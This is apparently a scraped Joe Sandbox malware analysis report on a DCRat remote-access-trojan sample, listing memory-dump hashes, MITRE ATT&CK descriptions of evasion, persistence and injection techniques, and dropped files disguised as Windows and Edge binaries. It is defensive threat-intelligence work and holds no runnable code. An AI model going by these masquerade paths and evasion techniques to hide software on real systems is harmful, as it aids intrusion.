Source File: 00000035.00000002.2473966081.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_7ff848e70000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3272aba964bf720f88c3cee06fa60d9e77996c9598086a52eebc5bda0cef683
Instruction ID: 6a737583308b4ef8cf5dfc0837b4d08a79d883053531b0a9d461ed317e8bd541
Opcode Fuzzy Hash: f3272aba964bf720f88c3cee06fa60d9e77996c9598086a52eebc5bda0cef683
Instruction Fuzzy Hash: 3601D831B18A494FC74CB63CD8554B477D0FF96216B8842BAD04AC7192EE2AEC8AC785

Function 00007FF848E74058 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000035.00000002.2473966081.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_7ff848e70000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c868c8d20811d21149393b0ea97234c088b2bb23c863a27dc67a2f16ada4e7e9
Instruction ID: 2379da71e59d7bf3bc04869bc4e28abb68011330f0e5839677107435f7baa679
Opcode Fuzzy Hash: c868c8d20811d21149393b0ea97234c088b2bb23c863a27dc67a2f16ada4e7e9
Instruction Fuzzy Hash: BB11E56184E7C24FD747A7B448251A4BFB0AF03254B4E41EBC0858B0E3EAAE184AC722

Function 00007FF848E62398 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000035.00000002.2473966081.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_7ff848e60000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 186f6d6bf1604ac75e8384f1cd702e494602cbb8164b1bc661a1f67140bdc22d
Instruction ID: f81ff1e9c14b1e5a62d46c839345df5c0fb569eb5322447fb6ced59063641e8c
Opcode Fuzzy Hash: 186f6d6bf1604ac75e8384f1cd702e494602cbb8164b1bc661a1f67140bdc22d
Instruction Fuzzy Hash: F911FA3094891ACFDB68EB08C884BA9B3F1FB68311F4001B9C40EE7691DB35AD80DB85

Function 00007FF848E60C40 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000035.00000002.2473966081.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_7ff848e60000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b2e3b7ec81ad27648dd1297d8726867d428adf5c2345ab7514c8d668a9f13af
Instruction ID: 62eed9485e9813d401ae7f9eeec9734b840154183bb1d33ebe6db783b8a1e53e
Opcode Fuzzy Hash: 2b2e3b7ec81ad27648dd1297d8726867d428adf5c2345ab7514c8d668a9f13af
Instruction Fuzzy Hash: 15018C3590D6999FE702FB28C8442DDBFB0EF42360F5545B6C044EB292DA386A898B84

Function 00007FF848E6476B Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000035.00000002.2473966081.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_7ff848e60000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 564811df3341a67cedba09dbffc5440e4de5f582db33a59a0930a5cecb0b3b55
Instruction ID: 1189e2bda51583aac6c466c94dad6d19439c7eafe551c0d37d4086c159965ddc
Opcode Fuzzy Hash: 564811df3341a67cedba09dbffc5440e4de5f582db33a59a0930a5cecb0b3b55
Instruction Fuzzy Hash: 8E011D3090C41E8EEB64FA44D8517F872A1FB54365F5040BAD81EF3192EF3879D58A09

Function 00007FF848E60C50 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000035.00000002.2473966081.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_7ff848e60000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e89e45e757d0538b9e22a3a296b692ec20fb8e040182c046c51f5add90598aee
Instruction ID: b2b8875c47ca063fac3825a2a1ea0182adbecd3caf3257abdc8497e043532d6c
Opcode Fuzzy Hash: e89e45e757d0538b9e22a3a296b692ec20fb8e040182c046c51f5add90598aee
Instruction Fuzzy Hash: 67014B7090D7899FE702EB6488846DDBFF0EF02314F5441E6D444EB292DA386A488745

Function 00007FF848E647F2 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000035.00000002.2473966081.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_7ff848e60000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e802f2d097568cec3fa52b364d907dd46164ece8d02af576cb16dd2647e00adc
Instruction ID: 135c536dd038cbb2ad82e04fc3629bc8d2b21beb8eec37928fb60e16fcf516a6
Opcode Fuzzy Hash: e802f2d097568cec3fa52b364d907dd46164ece8d02af576cb16dd2647e00adc
Instruction Fuzzy Hash: E6F0543090C41A8EEA64F604D4556B87391FF553A4F9041B6DC4DF31A2FF387D954649

Function 00007FF848E60B77 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000035.00000002.2473966081.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_7ff848e60000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 849ce57074af94ef2dfc2bd30472d2e0e6621d792c6fec3cd77b958c2a59e3f2
Instruction ID: c12b1b538196bb15c1c96a5b55d8ae4b42bef9ab84d9841ff58b916f105e1972
Opcode Fuzzy Hash: 849ce57074af94ef2dfc2bd30472d2e0e6621d792c6fec3cd77b958c2a59e3f2
Instruction Fuzzy Hash: 8BF08C3925DA85CFD742EA3D88A58D4BF60EB02104BDA01FAD089CB5A2D3255C5EC741

Function 00007FF848E979E9 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000035.00000002.2473966081.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_7ff848e90000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb0eb12f3d5320669c4dce23b289a0b8f52a467f12c3d56129468021eeb996a6
Instruction ID: e43b296158b5f2c117e9848df6d0357b7c864a77961d8df2c1b958b5a3b9580f
Opcode Fuzzy Hash: eb0eb12f3d5320669c4dce23b289a0b8f52a467f12c3d56129468021eeb996a6
Instruction Fuzzy Hash: 38E01A3184E7C08FC70BAB3488688503F60EF6B61174A41EBC045CF6B3EA298C89C712

Function 00007FF848E756A8 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000035.00000002.2473966081.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_7ff848e70000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7c478d697799a5a7f24270fd86399c56b43d0334bb21ad7333c0f9bc131bbc2
Instruction ID: 5a792aef1ecdeb39e7fcc84582557c3ca46575fc9d933f4d6e0950c573b494a2
Opcode Fuzzy Hash: f7c478d697799a5a7f24270fd86399c56b43d0334bb21ad7333c0f9bc131bbc2
Instruction Fuzzy Hash: 0FD05E30B6090D4B8B4CB62D8458434B3D1F7AA6067D452B8D40BC3281ED25ECC68B84

Function 00007FF848E75288 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000035.00000002.2473966081.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_7ff848e70000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ac8d9f4319cae420723dd9b2f75b70c74d50eb058be3078c47a585f50610937
Instruction ID: 800040897699cdcc462afd3de698d850e2edc8a49d82577bf9eb1e5f829eb8c5
Opcode Fuzzy Hash: 8ac8d9f4319cae420723dd9b2f75b70c74d50eb058be3078c47a585f50610937
Instruction Fuzzy Hash: A5D05E30B6090D4B8B1CB62D8458434F3D1F7AA2067D45278940BC7281ED25ECC68B84

Function 00007FF848E9A5C0 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000035.00000002.2473966081.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_7ff848e90000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80

Function 00007FF848E65035 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000035.00000002.2473966081.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_7ff848e60000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43b87db904ccdea304c1ca1f7b70ba481daea34ef60f95de779bfb05517315ce
Instruction ID: 7c5ec15222349d61f3e17f28a74a6160dd8ba60e9cb9b202d977dbb37d3a6829
Opcode Fuzzy Hash: 43b87db904ccdea304c1ca1f7b70ba481daea34ef60f95de779bfb05517315ce
Instruction Fuzzy Hash: 44E01A20E0C12A8EF7A4FA14C8553BD62A1FF85390F9440B4D81EB32E2CE387D85870A

Function 00007FF848E63FE3 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000035.00000002.2473966081.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_7ff848e60000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b20abfbeaa48dfb07130820bc2bd8d4abb79acdd4fdd384df908c0f2d9738724
Instruction ID: dd4c708db4cafbb2691e64967004417898531e4f6514bef381a85ea06fde7a86
Opcode Fuzzy Hash: b20abfbeaa48dfb07130820bc2bd8d4abb79acdd4fdd384df908c0f2d9738724
Instruction Fuzzy Hash: 33E01211E2C5951EF29DB53C44263B454C1BF84751F884079D40EE32C3DE6D3C440296

Function 00007FF848E7400E Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000035.00000002.2473966081.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_7ff848e70000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a20173b58304f0f19a46f2443c0a245264dcc3a706b0e199e102f44841ca720d
Instruction ID: b72f0dcbb59148cd226fa548bcaca7cb6de50246dcb4dba90c23fba912608df1
Opcode Fuzzy Hash: a20173b58304f0f19a46f2443c0a245264dcc3a706b0e199e102f44841ca720d
Instruction Fuzzy Hash: ACE08C71D0980E8FE794EA48C4042BD7BA0FF40240F14023AC00A82286EF3928424B80

Function 00007FF848E7457F Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000035.00000002.2473966081.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_7ff848e70000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4b0104fbead0baf0710752d857b1eb15cf7d95b308d4dbc7bd2e6b15b31362d
Instruction ID: 416fc20bd3a4c7fcfcac8cea2cd8b82e8bcb9598285ab11dbf989d6323e5981e
Opcode Fuzzy Hash: d4b0104fbead0baf0710752d857b1eb15cf7d95b308d4dbc7bd2e6b15b31362d
Instruction Fuzzy Hash: 5FD01760D0C5068EE659BA4884406B82361FF44388F640035D81E932C2CF38A812C60A

Function 00007FF848E606AD Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000035.00000002.2473966081.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_7ff848e60000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac7b0ac8a8977b2166bdcafdea76f4d557da43147bc43dd4b69a1236d479024c
Instruction ID: 2d170cd6ac3ddbd40df591abbaaa3398485336ff1f6de3de9094e0f15cb8ab50
Opcode Fuzzy Hash: ac7b0ac8a8977b2166bdcafdea76f4d557da43147bc43dd4b69a1236d479024c
Instruction Fuzzy Hash: 69C08C00E5F53F08E445712E14020ACA2007FC42A0FD00032C01C700929EAD30C5024E

Function 00007FF848E61310 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000035.00000002.2473966081.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_7ff848e60000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1800fbf8d0802c0db32221d879b3273cf0156490a78abdb803dccd60cdd09fce
Instruction ID: 4c4c54f3c8cde94948c7a2f49b0cb6aad3158be49989b9562e90b4b595afe2f7
Opcode Fuzzy Hash: 1800fbf8d0802c0db32221d879b3273cf0156490a78abdb803dccd60cdd09fce
Instruction Fuzzy Hash: EEC04C349558098FC948FB29CC8991477A0FF99215BD51090E409C7171E669ECD5D745

Function 00007FF848E606D0 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000035.00000002.2473966081.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_7ff848e60000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3d1b863e05a36076fb3914a81ee039196d249017470fdedf4c6784e9210262a
Instruction ID: 76001be2627f62b7e0961547e6f0a2bd22b71584716b6d6c6d474acfe090cbdb
Opcode Fuzzy Hash: f3d1b863e05a36076fb3914a81ee039196d249017470fdedf4c6784e9210262a
Instruction Fuzzy Hash: 1BB01200CAE41F04E408317A08420A470407FC4140FC00070D40C7008299DD3094034A

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.
Tactics:	Lateral Movement
Data Sources:	File: File Creation, File: File Modification, Network Share: Network Share Access, Process: Process Creation
Platforms:	Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report fdsN8iw6WG.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DCRat

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\Microsoft\Edge\Application\CSC13EEC4598AE74082ADE16A1F2183AE80.TMP

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

C:\Program Files\Microsoft\66fc9ff0ee96c2

C:\Program Files\Microsoft\sihost.exe

C:\Program Files\Microsoft\sihost.exe:Zone.Identifier

C:\Program Files\Windows Portable Devices\9e0136ccaf7772

C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe

C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe:Zone.Identifier

C:\Program Files\Windows Sidebar\Shared Gadgets\9e8d7a4ca61bd9

C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe

C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe:Zone.Identifier

C:\Users\user\9e0136ccaf7772

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\RuntimeBroker.exe.log

Windows Analysis Report
fdsN8iw6WG.exe